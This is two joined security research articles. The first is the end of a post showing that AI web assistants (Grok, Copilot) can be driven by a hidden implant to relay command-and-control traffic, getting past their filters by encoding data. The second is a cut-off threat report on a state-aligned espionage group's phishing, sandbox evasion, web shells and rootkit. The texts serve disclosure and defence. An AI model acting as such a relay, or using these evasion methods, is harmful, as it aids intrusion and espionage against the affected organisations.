can work without an API key or a registered account, reducing the effectiveness of traditional kill switches such as key revocation or account suspension. We then connect the technique to the broader trajectory: once AI services can be used as a stealthy transport layer, the same interface can also carry prompts and model outputs that act as an external decision engine, a stepping stone toward AI-Driven implants and AIOps-style C2 that automate triage, targeting, and operational choices in real time. AI-Driven (AID) Malware AI-Driven malware is malware that uses an AI model as part of its runtime decision loop, not just during development. Instead of executing a fixed, preprogrammed flow, the implant collects local signals from the infected host and uses a model to interpret them and decide what to do next. In practice, the model output can influence which capabilities are activated, which targets or data are prioritized, how aggressive the malware should be, and whether the host is worth continuing to operate on. This shifts part of the malware’s logic from static code into model-driven, context-aware behavior, which can make campaigns more adaptive and less predictable than traditional rule-based decision trees. A useful way to think about AID malware is that the model becomes an external or internal decision engine. The implant provides a compact “situation report” (environment artifacts, user and domain context, installed software, file and process metadata, observed security controls, and other host indicators) and receives back guidance that can shape subsequent execution. Over time, this enables behavior that is more tailored per-host, can change across infections without code changes, and can reduce repeatable patterns that defenders often rely on for signatures and sandbox detonation. There are two primary integration approaches: API-based integration The malware interacts with a remote model or agent through an API. That model can be hosted by a mainstream provider, a niche platform, or attacker-controlled infrastructure running an agent. This approach is operationally flexible and keeps the implant lightweight, but it introduces network dependencies and creates telemetry that defenders may be able to hunt for. It can also create a potential kill switch if the workflow depends on revocable credentials, unless the actor can blend or relay the traffic through intermediate layers. Embedded model The model is packaged locally, either inside the binary or as a bundled component. This removes the need for external inference calls and can reduce network exposure, but it increases payload size and resource requirements, and makes model updates harder. In real-world terms, embedded approaches trade operational convenience for stealth and independence from external services. AI Agent As A C2 Proxy Abusing legitimate services for C2 is not new. We’ve seen it with Gmail, Dropbox, Notion, and many others. The usual downside for attackers is how easily these channels can be shut down: block the account, revoke the API key, suspend the tenant. Directly interacting with an AI agent through a web page changes this. There is no API key to revoke, and if anonymous usage is allowed, there may not even be an account to block. Our proposed attack scenario is quite simple: an attacker infects a machine and installs a piece of malware. Then the malware communicates directly with either Grok or Copilot through the web interface, sending a prompt that causes the AI agent to issue an HTTP(S) request to an attacker-controlled URL, retrieve content from that site, and return the attacker’s response via the AI output back to the malware. Web App PoC To test if our attack scenario is possible, we have set up two basic requirements: No authentication requirement: zero restrictions on the request, no account, no API key. Arbitrary web fetch with data in and out: the AI must be able to fetch a website we control, carry data in query parameters, and return content from that site in its response. We found two AI providers that meet these requirements: Grok and Copilot. There were some minor restrictions, such as not being able to send data to direct IPs or plain HTTP, so we set up a fake HTTPS website to serve as our C2 server. We registered a domain, deployed a simple site, and in the spirit of things, let AI help us generate the entire thing. The result is a Siamese cat fan club website. One of the pages is a “breed comparison” page. For example, we can ask Copilot at https://copilot.microsoft.com to summarize that page; no account is needed. The same applies to Grok at https://grok.com. Now, in a real attack scenario, we would want to send data to the C2 (for example, the result of system reconnaissance on the infected machine) and receive data back (a command or at least an acknowledgment). That’s easy: we append the data, in some structured format, to the URL’s query parameters. There do appear to be safeguards: if we make it too obvious that we’re sending clearly malicious or sensitive data, some services try to block or sanitize it. However, simply encrypting or encoding the data in a high-entropy blob is enough to bypass these checks. On the server side, we set up a breed comparison table, comparing different cat breeds. But one can’t really compare a cat breed without knowing what the cat breed’s “favorite Windows command to execute” is. For “stealth”, we made the page only display this command column when the my_breed_data URL parameter is present. We instruct the AI to visit the page and “return the cat’s favorite Windows command” based on a pattern embedded in the HTML. As shown in the image, both Grok and Copilot gladly followed up on our prompt, fetched our site, and returned a response containing the command we planted. Of course, in a real attack, this command (or the whole payload) could be further encoded or encrypted to avoid triggering any model-side safeguards. This demonstrates the feasibility of implementing the behavior end-to-end in a browser with no logged-in user. The next question is: how would actual malware do this from software, without relying on a visible browser window or any human interaction? WebView Instead of API Confirming that the technique works in a regular browser is one thing. Making it usable from malware is another. For our PoC, we set ourselves a constraint: get it working in C++, without relying on a direct API key or random HTTP requests to the AI provider’s website. Sending raw HTTP requests that don’t look like a normal browser session is more likely to hit rate limits, CAPTCHA, or behavioral checks. Instead, we decided to emulate a browser from within our C++ program. For that, we used WebView2, an embedded browser component that lets native Windows apps display and interact with web content. The WebView2 runtime is preinstalled on all Windows 11 systems and has been broadly rolled out to modern Windows 10 versions via updates. Even if it’s missing, an attacker could bundle it with the malware or download it on first run. Using WebView, we created a quick PoC: a C++ program that opens a WebView pointing to either Grok or Copilot. From there, we have two slightly different flows: Grok: Once the page is loaded, we can inject our prompt directly into the q parameter in the URL, and Grok will automatically follow our prompt without any further steps. Copilot: the flow is a bit trickier and uses JavaScript inside the loaded page to submit the prompt to the Copilot UI. Either way, it works. Our program does the following: Enumerate some basic information about the machine. Append it to the URL of our fake Siamese cat C2 site Open a (hidden) WebView window to the AI provider’s website. Ask the AI to fetch and “summarize” that URL. Parse the AI’s response and act on the embedded command. WebView is just one example of how to do this in C++. Other platforms and languages have similar embedded browser controls that can achieve the same goal. The PoC we created is intentionally simple, but it can easily be extended to behave more like real-world malware. In a full implementation, the implant could first send host enumeration data and register itself with the C2 server. The C2 server could then instruct the backdoor to sleep, collect additional information, check in at a later time, download further payloads, or execute arbitrary commands. None of this would be difficult to achieve once we have demonstrated that a bidirectional communication channel between malware and a C2 server can be established through an AI agent. Once the PoC was functional, we responsibly disclosed these findings to the Microsoft security team and the xAI security team. Many More Possibilities This technique is one example of how a threat actor can abuse an AI web app by using it as a proxy for C2, but it is far from the only option. The same interface could be used to request AI-generated commands to locate files, enumerate the system, search for sensitive data, or generate PowerShell code to move laterally across the network. Instead of relying on a skilled human operator, malware could directly task an AI agent for what to do next. Beyond direct command generation, an attacker could also rely on AI to handle decision-making logic that is usually embedded in the malware itself. For example, an implant might send a short description of the host (domain, user role, installed software, geography) and ask the AI whether this system is worth further exploitation, which tools to deploy next, or how aggressively to move laterally without raising suspicion. The agent’s response would then shape the rest of the campaign, effectively turning the AI into a remote “brain” for the malware. In the rest of this article, we focus on broader AI-Driven (AID) malware concepts and how future campaigns may integrate AI into their decision-making and operations. Our goal is not just to highlight one clever C2 trick, but to show how the same building blocks, web-accessible AI agents, and flexible prompts evolve into full AI-assisted attack workflows. (Near)-Future AI-Driven Malware While current AI-Driven (AID) threats have not yet been utilized in an optimal way, the practical impact of AID malware or AI-assisted attacks remains limited, largely experimental, inconsistent, or easily replicable using traditional decision-tree logic. However, we can identify at least one major area where AI could become pivotal in the future: data analysis and infection targeting. AI has the potential to dramatically accelerate the identification of valuable data within compromised systems, the prioritization of targets, and the optimization of infection spread. By automating reconnaissance and decision-making steps that currently require human effort, AI could enable attackers to execute campaigns much faster and with greater precision. This capability, when it matures, could mark a significant turning point in how cyberattacks are conducted, shifting the balance between speed, accuracy, and scale in favor of malicious operators. The three future AI use cases mentioned below represent the scenarios we believe will genuinely advance threat actors’ capabilities. At the core of these developments lies one central concept: data analysis and infection targeting. As some of these techniques may already be implemented, we assess that in the near future, the methods described below will be expanded upon and widely adopted by threat actors, particularly those capable of leveraging advanced AI-driven capabilities. AID – Anti-Sandbox Technique The majority of modern malware families are designed to collect detailed system information from infected machines. This typically includes data such as the username, domain name, computer name, installed software, running processes, startup programs, and other environment details. Such reconnaissance allows the malware to better understand its execution context, whether it’s operating within a corporate network, a sandbox, or a personal device, and to adjust its behavior accordingly. A potential future scenario involves a Remote Access Trojan (RAT), infostealer, Loader, or similar type of malware leveraging an AI model or API as part of its operational logic. In this case, the malware could utilize a predefined prompt combined with system data it has already collected and send this information to an AI service. The AI agent would then analyze the data and determine the likelihood that the environment is a real target or a sandbox used for malware analysis. This method could function as an advanced AI anti-sandbox and environment validation technique. Instead of relying solely on hardcoded checks or local heuristics, the malware could offload the decision-making process to a remote AI system. If the AI’s response indicated “no sandbox detected,” the malware could proceed to execute its full capabilities, including data exfiltration, persistence installation, and communication with its C&C. If malware begins to outsource environment verification to AI services, detecting and attributing infections will become significantly harder. An AI-Driven validation step can cause sandboxes and automated analysis tools to fail to trigger malicious behavior, because the payload may remain dormant until a remote model confirms the host is a “real” target. As a result, traditional signature- and sandbox-based detection pipelines may produce fewer observable indicators, while telemetry that would normally reveal malicious activity may never appear in analyst environments. This reduces the visibility defenders rely on and increases the chance that sophisticated campaigns slip through initial analysis windows. AID – Command and Control Servers While communicating with an AI API endpoint or embedding a model locally can generate noisy telemetry, a more subtle application of AI could occur at the Command and Control. C&C servers could use AI to automatically identify and categorize compromised hosts. For example, an AI-Driven triage step might discard obvious sandboxes and withhold second-stage payloads from those hosts. Beyond sandbox detection, AI applied at the C&C could score victims based on available PII. This enables prioritization of follow-on actions and lateral movement. Once AI determines that an infection is a high-value target (such as corporate accounts or servers), the bot will receive different commands from the C&C, and distinct workflows will be applied to this infection, including a notification to prioritize the “manual” lateral movement. In the other case, the C&C might deploy a simple miner to a low-value victim, as further actions might not be of interest to the threat actor. Another potential implementation would mirror the concept of MCP servers, but instead of integrating various red-teaming tools, the attacker could connect an existing malware family directly to an MCP server. AID – Ransomware, Wipers & Data Exfiltration The same concept used to identify valuable users or high-value targets can also be applied to files. An AI model could score which files are worth encrypting or exfiltrating based on metadata (file names, sizes, creation and modification timestamps, paths, …), as well as their content. By prioritizing high-value files, an attacker can accelerate encryption or data theft while generating far fewer I/O events, thereby reducing the likelihood of triggering volume-based alarms and increasing the chances of ignoring decoy or bait files. Many ransomware detection workflows in XDRs rely on volume or rate thresholds and therefore only declare malicious activity after a sizable number of files have been encrypted. If an attacker limits activity to a much smaller, carefully chosen pool of files, this can undermine those heuristics and create detection gaps. In a notable 2022 analysis, Splunk researcher Shannon Davis measured the time it takes several prominent ransomware families to encrypt large volumes of data, reporting times that ranged from a couple of minutes for the fastest families to several hours for slower ones. These experiments showed that some ransomware variants can encrypt ~100 GB in a matter of minutes. The worrying question for AI-Driven ransomware is straightforward: What if an attacker does not need to encrypt 100 GB to achieve their objective? If an AID payload can prioritize and target only a small set of high-value files (for example, critical databases, business documents, or encryption keys) using model-driven scoring, the time to accomplish effective damage could be dramatically less than the bulk-encryption numbers. In other words, targeted encrypt-and-extort campaigns could succeed in seconds or minutes while generating far fewer observable file-I/O events. The same dynamics apply to data exfiltration, where ransomware groups frequently steal sensitive data and then publish it on their onion sites or leak it on their leak blogs. Advanced persistent threat (APT) actors customize their malware and prompts to fit the target’s profile, infrastructure, and the value of the data they expect to find. For example, attackers focused on defense contractors, research labs, or critical infrastructure operators will prioritize reconnaissance and payloads that can discover, collect, and exfiltrate technical schematics, classified reports, or proprietary designs. Ignoring unwanted documents that could potentially cause high-volume data exfiltration. AID wipers may target specific files instead of everything to take down a specific machine. Or wipers may avoid taking down the machine and instead target specific programs, making various processes unusable. (Near)-Future AI-Driven Campaigns While we previously discussed how AI-Driven (AID) malware could eventually find its optimal use cases, this section outlines how such implementations may realistically occur. Although AID Embedded-Model malware offers superior stealth, as no input or output is observable by external AI providers (such as OpenAI, Anthropic, and Gemini), we believe that AID API-Based implementations will likely be preferred. This is primarily due to practicality, embedding or bundling a model significantly increases the binary size, which usually goes against the common preference for lightweight payloads. Currently, there is a growing number of AI platforms advertising malicious capabilities, such as FraudGPT, EvilAI, MalwareGPT, etc., which could theoretically be used to power API-based AID malware. However, from a defensive standpoint, these connections are relatively easy to detect just by blacklisting known malicious domains. For an AID API-based approach to achieve real stealth, threat actors would need to employ AI proxy servers to relay requests to these malicious AI platforms. This setup would conceal direct communication with the malicious AI service, making network detection challenging. Alternatively, attackers could host their own local AI model on a remote server. In that case, the server would operate more like an AIOps Command and Control Server (AIOps-C&C) rather than a mere proxy, enabling AI-assisted decision-making and automation while keeping communication hidden within the attacker’s infrastructure. Conclusion AI assistants are no longer just productivity tools; they are becoming part of the infrastructure that malware can abuse. In this research, we showed how Grok and Microsoft Copilot can be driven through their web interfaces and abused as covert C2 relays, without any API keys or user accounts. By combining a simple “C2 website” with a WebView2-based C++ implant, we demonstrated a full end-to-end path in which victim data flows out via URL query parameters, and attacker commands flow back in through AI-generated responses. More importantly, this is not a one-off trick. Any AI service that exposes web fetch or browsing capabilities, especially to anonymous users, inherits a similar level of abuse potential. Today, that may look like a creative way to hide C2 in “normal” AI traffic. Tomorrow, the same pattern can evolve into fully AI-Driven malware and AIOps-style C2, where models help decide which hosts to keep, which files to steal or encrypt, and when to stay dormant to avoid sandboxes and detection. This is a service-abuse class of issue, not a traditional memory corruption bug. Mitigations, therefore, require changes on both sides. AI providers need to harden web-fetch features, enforce authentication, and give enterprises greater control and visibility into how their models access external URLs. Defenders need to start treating AI domains as high-value egress points, monitor for automated and unusual usage patterns, and incorporate AI traffic into their hunting and incident response playbooks. As AI continues to integrate into everyday workflows, it will also integrate into attacker workflows. Understanding how these systems can be misused today is the first step toward hardening them for the future, and ensuring that AI remains more useful to defenders than to the malware that tries to hide behind it. “The Turkish Rat” Evolved Adwind in a Massive Ongoing Phishing Campaign Check Point Research Publications August 11, 2017 “The Next WannaCry” Vulnerability is Here Check Point Research Publications March 12, 2026 “Handala Hack” – Unveiling Group’s Modus Operandi SUBSCRIBE TO CYBER INTELLIGENCE REPORTS We value your privacy! BFSI uses cookies on this site. We use cookies to enable faster and easier experience for you. By continuing to visit this website you agree to our use of cookies.
research.checkpoint.comFeb 17, 2026extracted
The Shadow Campaigns: Uncovering Global Espionage
This investigation unveils a new cyberespionage group that Unit 42 tracks as TGR-STA-1030. We refer to the group’s activity as the Shadow Campaigns. We assess with high confidence that TGR-STA-1030 is a state-aligned group that operates out of Asia. Over the past year, this group has compromised government and critical infrastructure organizations across 37 countries. This means that approximately one out of every five countries has experienced a critical breach from this group in the past year. Further, between November and December 2025, we observed the group conducting active reconnaissance against government infrastructure associated with 155 countries. This group primarily targets government ministries and departments. For example, the group has successfully compromised: Five national-level law enforcement/border control entities Three ministries of finance and various other government ministries Departments globally that align with economic, trade, natural resources and diplomatic functions Given the scale of compromise and the significance of these organizations, we have notified impacted entities and offered them assistance through responsible disclosure protocols. Here we describe the technical sophistication of the actors, including the phishing and exploitation techniques, tooling and infrastructure used by the group. We provide defensive indicators to include infrastructure that is active at the time of this publication. Further, we explore an in-depth look at victimology by region with the intent of demonstrating the suspected motivations of the group. The results indicate that this group prioritizes efforts against countries that have established or are exploring certain economic partnerships. Additionally, we have also pre-shared these indicators with industry peers to ensure robust cross-industry defenses against this threat actor. Palo Alto Networks customers are better protected from the threats described in this article through products and services, including: Advanced URL Filtering and Advanced DNS Security Advanced WildFire Advanced Threat Prevention Cortex XDR and XSIAM If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team. Unit 42 first identified TGR-STA-1030 (aka UNC6619) upon investigating a cluster of malicious phishing campaigns (referred to here as the Shadow Campaigns) targeting European governments in early 2025. We use the prefix TGR-STA as a placeholder to denote a temporary group of state-aligned activity while we continue to refine attribution to a specific organization. Since our initial investigation, we have identified actor infrastructure dating as far back as January 2024, suggesting that the group has been active for at least two years. Over the past year, we have monitored the evolution and expansion of the group as it has compromised: Five national-level law enforcement/border control entities Three ministries of finance and various other government ministries Departments globally that align with economic, trade, natural resources and diplomatic functions We assess with high confidence that TGR-STA-1030 is a state-aligned group that operates out of Asia. We base this assessment on the following findings: Frequent use of regional tooling and services Language setting preferences Targeting and timing that routinely align with events and intelligence of interest to the region Upstream connections to operational infrastructure originating from the region Actor activity routinely aligning with GMT+8 Additionally, we found that one of the attackers uses the handle “JackMa,” which could refer to the billionaire businessman and philanthropist who co-founded Alibaba Group and Yunfeng Capital. In February 2025, Unit 42 investigated a cluster of malicious phishing campaigns targeting European governments. These campaigns followed a pattern of being sent to government email recipients with a lure of a ministry or department reorganization and links to malicious files hosted on mega[.]nz. Figure 1 below shows an example. Clicking on the link downloads an archive file with language and naming that is consistent with the targeted country and ministry. We assess that an Estonian government entity identified the campaign and uploaded one such ZIP archive to a public malware repository. In this case, the Estonian filename was: Politsei- ja Piirivalveameti organisatsiooni struktuuri muudatused.zip This translates to Changes to the organizational structure of the Police and Border Guard Board.zip Analyzing the archive, we found that the contents were last modified on Feb. 14, 2025. Further, the archive itself contains an executable file containing an identical name as the ZIP and a zero-byte file named pic1.png. Reviewing the executable metadata, we found that the file version is presented as 2025,2,13,0, suggesting that the file was likely created one day prior, on Feb. 13. This date also corresponds to the PE compile timestamp. Additionally, the metadata shows that the file’s original name was DiaoYu.exe. The term Diaoyu translates to fishing, or phishing in a cybersecurity context. The malware employs a dual-stage execution guardrail to thwart automated sandbox analysis. Beyond the hardware requirement of a horizontal screen resolution greater than or equal to 1440, the sample performs an environmental dependency check for a specific file (pic1.png) in its execution directory. In this context, pic1.png acts as a file-based integrity check. If the malware sample is submitted to a sandbox in isolation, the absence of this auxiliary file causes the process to terminate gracefully before detonation, effectively masking its malicious behavior. Only upon satisfying these prerequisites does the malware proceed to audit the host for the following cybersecurity products: Avp.exe (Kaspersky) SentryEye.exe (Avira) EPSecurityService.exe (Bitdefender) SentinelUI.exe (Sentinel One) NortonSecurity.exe (Symantec) This narrow selection of products is interesting, and it is unclear why the actor chose to only look for these specific products. While various malware families commonly check for the presence of antivirus products, malware authors typically include a more comprehensive list that encompasses a variety of global providers. After checking for these products, the malware downloads the following files from GitHub: hxxps[:]//raw.githubusercontent[.]com/padeqav/WordPress/refs/heads/master/wp-includes/images/admin-bar-sprite[.]png hxxps[:]//raw.githubusercontent[.]com/padeqav/WordPress/refs/heads/master/wp-includes/images/Linux[.]jpg hxxps[:]//raw.githubusercontent[.]com/padeqav/WordPress/refs/heads/master/wp-includes/images/Windows[.]jpg It should be noted that the padeqav GitHub project is no longer available. Finally, the malware performs a series of actions on these files that ultimately result in the installation of a Cobalt Strike payload. In addition to phishing campaigns, the group often couples exploitation attempts with their reconnaissance activities to gain initial access to target networks. To date, we have not observed the group developing, testing or deploying any zero-day exploits. However, we assess that the group is comfortable testing and deploying a wide range of common tools, exploitation kits and proof-of-concept code for N-day exploits. For example, over the past year, our Advanced Threat Prevention service has detected and blocked attempts by the group to exploit the following types of vulnerabilities: SAP Solution Manager privilege escalation vulnerability Pivotal Spring Data Commons remote file read XXE vulnerability Microsoft Open Management Infrastructure remote code execution vulnerability Microsoft Exchange Server remote code execution vulnerability D-Link remote code execution vulnerability HTTP directory traversal request attempt HTTP SQL injection attempt Struts2 OGNL remote code execution vulnerability Ruijieyi Networks remote command execution vulnerability Eyou Email System remote command execution vulnerability Beijing Grandview Century eHR Software SQL injection vulnerability Weaver Ecology-OA remote code execution vulnerability Microsoft Windows win.ini access attempt detected Commvault CommCell CVSearchService download file authentication bypass vulnerability Zhiyuan OA remote code execution vulnerability On one occasion, we observed the actor connecting to e-passport and e-visa services associated with a ministry of foreign affairs. Because the server for these services was configured with Atlassian Crowd software, the actor attempted to exploit CVE-2019-11580, uploading a payload named rce.jar. The code included in the payload was similar to the description of code from another analysis of CVE-2019-11580 provided by Anquanke. We assess that the group relies heavily on a mix of command-and–control (C2) frameworks and tools common to the actors’ region to move laterally and maintain persistent access within compromised environments. From 2024 through early 2025, we observed the group commonly deploying Cobalt Strike payloads. However, over time the group slowly transitioned to VShell as its tool of choice. VShell is a Go-based C2 framework. The group often configures its web access on 5-digit ephemeral TCP ports using ordered numbers. In November 2025, NVISO published comprehensive research [PDF] on the origins of this tool, its features and its wide-scale use by multiple threat groups and actors. Within the past year, we assess that the group has also leveraged frameworks like Havoc, SparkRat and Sliver with varying degrees of success. TGR-STA-1030 has frequently deployed web shells on external-facing web servers as well as on internal web servers to maintain access and enable lateral movement. The three most common web shells used by the group are Behinder, Neo-reGeorg and Godzilla. Further, we noted during one investigation that the group attempted to obfuscate its Godzilla web shells using code from the Tas9er GitHub project. This project obfuscates code by creating functions and strings with names like Baidu. It also adds explicit messages to governments. We have observed the group leveraging GO Simple Tunnel (GOST), Fast Reverse Proxy Server (FRPS), and IOX across both their C2 infrastructure and compromised networks to tunnel desired network traffic. During an investigation, we identified the group using a new Linux kernel rootkit, ShadowGuard. The sample we discovered (SHA-256 hash 7808B1E01EA790548B472026AC783C73A033BB90BBE548BF3006ABFBCB48C52D) is an Extended Berkeley Packet Filter (eBPF) rootkit designed for Linux systems. At this time, we assess that the use of this rootkit is unique to this group. eBPF backdoors are notoriously difficult to detect because they operate entirely within the highly trusted kernel space. eBPF programs do not appear as separate modules. Instead, they execute inside the kernel's BPF virtual machine, making them inherently stealthy. This allows them to manipulate core system functions and audit logs before security tools or system monitoring applications can see the true data. This backdoor leverages eBPF technology to provide the following kernel-level stealth capabilities: Kernel-level concealment: It can conceal process information details directly at the kernel level. Process hiding (syscall interception): The tool intercepts critical system calls, specifically using custom kill signals (entry and exit points) to identify which processes the attacker wants to hide. - It conceals specified process IDs (PIDs), making them invisible to standard user-space analysis tools like the standard Linux ps aux command - It can hide up to 32 processes simultaneously File and directory hiding: It features a hard-coded check to specifically conceal directories and files named swsecret. Allow-listing: The backdoor includes an allow list mechanism where processes placed on the list are deliberately excluded and remain unaffected by the hiding functionality. When started, the program will automatically check for the following: Root privileges eBPF support Tracepoint support Example commands once ShadowGuard is started are shown below in Table 1. Table 1. Examples of commands for ShadowGuard. Consistent with any advanced actor conducting cyberespionage, this group goes to great lengths to mask and obfuscate the origin of its operations. However, despite all of its best efforts, it is exceptionally hard to overcome the following two challenges: Network Traffic Inspection: It is widely known that several nations employ methods to censor and filter traffic entering/exiting their respective countries. As such, it is extremely unlikely that foreign cyberespionage groups would willingly route their network traffic through any nation that employs these inspection capabilities. Network evolution: Maintaining infrastructure for cyberespionage operations is hard. It requires the routine creation of new domains, virtual private servers (VPS) and network tunnels. Studying a group’s infrastructure over time almost always reveals mistakes and errors where tunnels collapse or perhaps identity protection services expire. We assess that the group applies a multi-tiered infrastructure approach to obfuscate its activities. Victim-Facing The group routinely leases and configures its C2 servers on infrastructure owned by a variety of legitimate and commonly known VPS providers. However, unlike most groups that configure their malicious infrastructure on bulletproof providers or in obscure locations, this group prefers to establish its infrastructure in countries that have a strong rule of law. For example, the group frequently chooses virtual servers in the U.S., UK and Singapore. We assess this preference in locations likely aids the group in three ways: Infrastructure may appear more legitimate to network defenders This could enable low-latency connections across the Americas, Europe and Southeast Asia These locations have separate laws, policies and priorities that govern the operations of their domestic law enforcement and foreign intelligence organizations. Thus, having infrastructure in these locations likely necessitates cross-agency cooperation efforts for their governments to effectively investigate and track the group. Relays To connect to the C2 infrastructure, the group leases additional VPS infrastructure that it uses to relay traffic through. These hosts are often configured with SSH on port 22 or a high-numbered ephemeral port. In some cases, we have also observed hosts configured with RDP on port 3389. Proxies Over time, the group has leveraged a variety of capabilities to anonymize its connections to the relay infrastructure. In early 2025, we observed the group using infrastructure we associated with DataImpulse, a company that provides residential proxy services. Since then, we have observed the group using the Tor network and other proxy services. Upstream In tracking upstream infrastructure, it is important to recognize that the primary goal of an espionage group is to steal data. To accomplish that task, a group has to build a path from the compromised network back to a network it can access. As such, the flow of data upstream typically correlates geographically to the group’s physical location. As noted above, the act of maintaining all of this infrastructure and its associated connections is quite challenging. On occasion, the group makes mistakes either because it forgets to establish a tunnel or because a tunnel collapses. When this happens, the group connects directly from its upstream infrastructure. On several occasions, we have observed the group connecting directly to relay and victim-facing infrastructure from IP addresses belonging to Autonomous System (AS) 9808. These IP addresses are owned by an internet service provider in the group’s region. We have identified several domains used by the group to facilitate malware C2 communications. Most were registered with the following top-level domains: me live help tech Noteworthy domains include: gouvn[.]me The group used this domain to target Francophone countries that use gouv to denote government domains. While the actor consistently pointed this domain name to leased victim-facing VPS infrastructure, we noted an anomaly in late 2024. While the domain never pointed to it, the actor appears to have copied an X.509 certificate with the common name gouvn[.]me from a victim-facing VPS to a Tencent server located in the actors’ region. Here it was visible for four days in November 2024. dog3rj[.]tech The group used this domain to target European nations. It’s possible that the domain name could be a reference to “DOGE Jr,” which has several meanings in a Western context, such as the U.S. Department of Government Efficiency or the name of a cryptocurrency. This domain was registered using an email address associated with the domain 888910[.]xyz. zamstats[.]me The group used this domain to target the Zambian government. Over the course of the past year the group has substantially increased its scanning and reconnaissance efforts. This shift follows the group's evolution from phishing emails to exploits for initial access. Most emblematic of this activity, we observed the group scanning infrastructure across 155 countries between November and December 2025, as noted in Figure 2. Given the expansive nature of the activity, some analysts might wrongly assume that the group simply launches broad scans across the entire IPv4 space from 1.1.1[.]1 to 255.255.255[.]255, but that is not the case. Based on our observation, the group focuses its scanning narrowly on government infrastructure and specific targets of interest across each country. The group’s reconnaissance efforts shed light on its global interests. We have also observed the group's success at compromising several government and critical infrastructure organizations globally. We assess that over the past year, the group compromised at least 70 organizations across 37 countries, as shown in Figure 3. The attackers were able to maintain access to several of the impacted entities for months. Impacted organizations include ministries and departments of interior, foreign affairs, finance, trade, economy, immigration, mining, justice and energy. This group compromised one nation’s parliament and a senior elected official of another. It also compromised national-level telecommunications companies and several national police and counter-terrorism organizations. While this group might be pursuing espionage objectives, its methods, targets and scale of operations are alarming, with potential long-term consequences for national security and key services. By closely monitoring the timing of the group’s operations, we have drawn correlations between several of its campaigns and real-world events. These correlations inform assessments as to the group’s potential motivations. The following sections provide additional insights from notable situations by geographic region. During the U.S. government shutdown that began in October 2025, the group began to display greater interest in organizations and events occurring across North, Central and South American countries. Over that month, we observed scanning of government infrastructure across Brazil, Canada, Dominican Republic, Guatemala, Honduras, Jamaica, Mexico, Panama and Trinidad and Tobago. Perhaps the most pronounced reconnaissance occurred on Oct. 31, 2025, when we observed connections to at least 200 IP addresses hosting Government of Honduras infrastructure. The timing of this activity falls just 30 days prior to the national election, in which both candidates signaled openness to restoring diplomatic relations with Taiwan. In addition to reconnaissance activities, we assess that the group likely compromised government entities across Bolivia, Brazil, Mexico, Panama, and Venezuela, as noted in Figure 4. We assess that the group likely compromised the network of a Bolivian entity associated with mining. The motivation behind this activity could be associated with interest in rare earth minerals. We find it noteworthy that the topic of mining rights became a central focus in Bolivia’s recent presidential election. In late July 2025, candidate Jorge Quiroga pledged to scrap multi-billion-dollar mining deals that the Bolivian government had previously signed with two nations. We assess that the group compromised Brazil’s Ministry of Mines and Energy. Brazil is considered to have the second largest supply of rare earth mineral reserves in the world. According to public reporting, exports of these minerals tripled in the first half of 2025. As Asian companies tighten their global control on these resources, the U.S. has begun looking to Brazil for alternative sourcing. In October, the U.S. Charge d'Affaires in Brazil held meetings with mining executives in the country. In early November, the U.S. International Development Finance Corporation invested $465 million in Serra Verde (a Brazilian rare earth producer). This has been seen as an effort to reduce reliance on Asia for these key minerals. We assess that the group compromised two of Mexico’s ministries. This activity is very likely associated with international trade agreements. On Sept. 25, 2025, Mexico News Daily reported on an investigation into Mexico’s latest plans to impose tariffs on certain goods. Coincidentally, malicious network traffic was first seen originating from networks belonging to Mexico’s ministries within 24 hours of the trade probe announcement. In December 2025, a report stated that local authorities destroyed a monument, prompting immediate condemnation from some leaders and calls for investigation. Coincidentally, around the same time, we assess that TGR-STA-1030 likely compromised government infrastructure that may be associated with the investigation. On Jan. 3, 2026, the U.S. launched Operation Absolute Resolve. This operation resulted in the capture of the Venezuelan president and his wife. In the days that followed, TGR-STA-1030 conducted extensive reconnaissance activities targeting at least 140 government-owned IP addresses. We further assess that as early as Jan. 4, 2026, the group likely compromised an IP address that geolocates to a Venezolana de Industria Tecnológica facility, as seen in Figure 5. This organization was originally founded as a joint venture between the Venezuelan government and an Asian technology company. The venture enabled the production of computers as an early step toward deepening technology and economic ties between the two regions. Throughout 2025, TGR-STA-1030 increased its focus on European nations. In July 2025, it applied a concerted focus toward Germany, where it initiated connections to over 490 IP addresses hosting government infrastructure. In August 2025, Czech President Petr Pavel privately met with the Dalai Lama during a trip to India. In the weeks that followed, we observed scanning of Czech government infrastructure, including: The Army Police Parliament Ministries of Interior, Finance and Foreign Affairs In early November, a Tibetan news source announced that the Czech president would also co-patronize the Dalai Lama’s 90th birthday gala. Shortly after, we witnessed a second round of scanning focused narrowly on the Czech president’s website. Separately, in late August, the group applied a concerted focus on European Union infrastructure. We observed the group attempting to connect to over 600 IP addresses hosting *.europa[.]eu domains. In addition to reconnaissance activities, we assess that the group likely compromised government entities in countries across Cyprus, Czechia, Germany, Greece, Italy, Poland, Portugal and Serbia, as shown in Figure 6. In doing so, the group compromised at least one ministry of finance where it sought to collect intelligence on international development from both the impacted country as well as the European Union. We assess that the group compromised government infrastructure in early 2025. The timing of this activity coincided with efforts by an Asian nation to expand certain economic partnerships across Europe. At the time, Cyprus was also taking preparatory steps toward assuming the presidency of the Council of the European Union at the end of the year, a position that it currently holds. We assess that the group likely compromised infrastructure associated with the Syzefxis Project. This project was intended to modernize Greek public sector organizations using high-speed internet services. While the group performs scanning widely across both continents, TGR-STA-1030 appears to prioritize its reconnaissance efforts against countries in the South China Sea and Gulf of Thailand regions. We routinely observe scanning of government infrastructure across Indonesia, Thailand and Vietnam. For example, in early November 2025, we observed connections to 31 IP addresses hosting Thai government infrastructure. Additionally, it’s worth noting that the group's reconnaissance efforts often extend beyond connections to web-facing content on ports 80 and 443. In November 2025, we also observed the group attempting to initiate connections to port 22 (SSH) on infrastructure belonging to: Australia’s Treasury Department Afghanistan’s Ministry of Finance Nepal’s Office of the Prime Minister and Council of Ministers In addition to reconnaissance activities, we assess that the group likely compromised government and critical infrastructure entities in countries including Afghanistan, Bangladesh, India, Indonesia, Japan, Malaysia, Mongolia, Papua New Guinea, Saudi Arabia, Sri Lanka, South Korea, Taiwan, Thailand, Uzbekistan and Vietnam, as shown in Figure 7. In March 2024, Indonesia pledged to increase certain counterterrorism coordination efforts. In mid-2025, the group compromised an Indonesian law enforcement entity. We assess that the group also compromised infrastructure associated with an Indonesian government official. This activity might have been associated with the extraction of natural resources from Papua province. We found that the official was tasked with overseeing development in the province and foreign investment in the mining sector. The group also compromised an Indonesian airline. The compromised infrastructure geolocates to facilities at Soekarno-Hatta International Airport as shown in Figure 8. The airline had been in talks with a U.S. aerospace manufacturer to purchase new aircraft as part of its strategic growth plans. At the same time, a competing interest was actively promoting 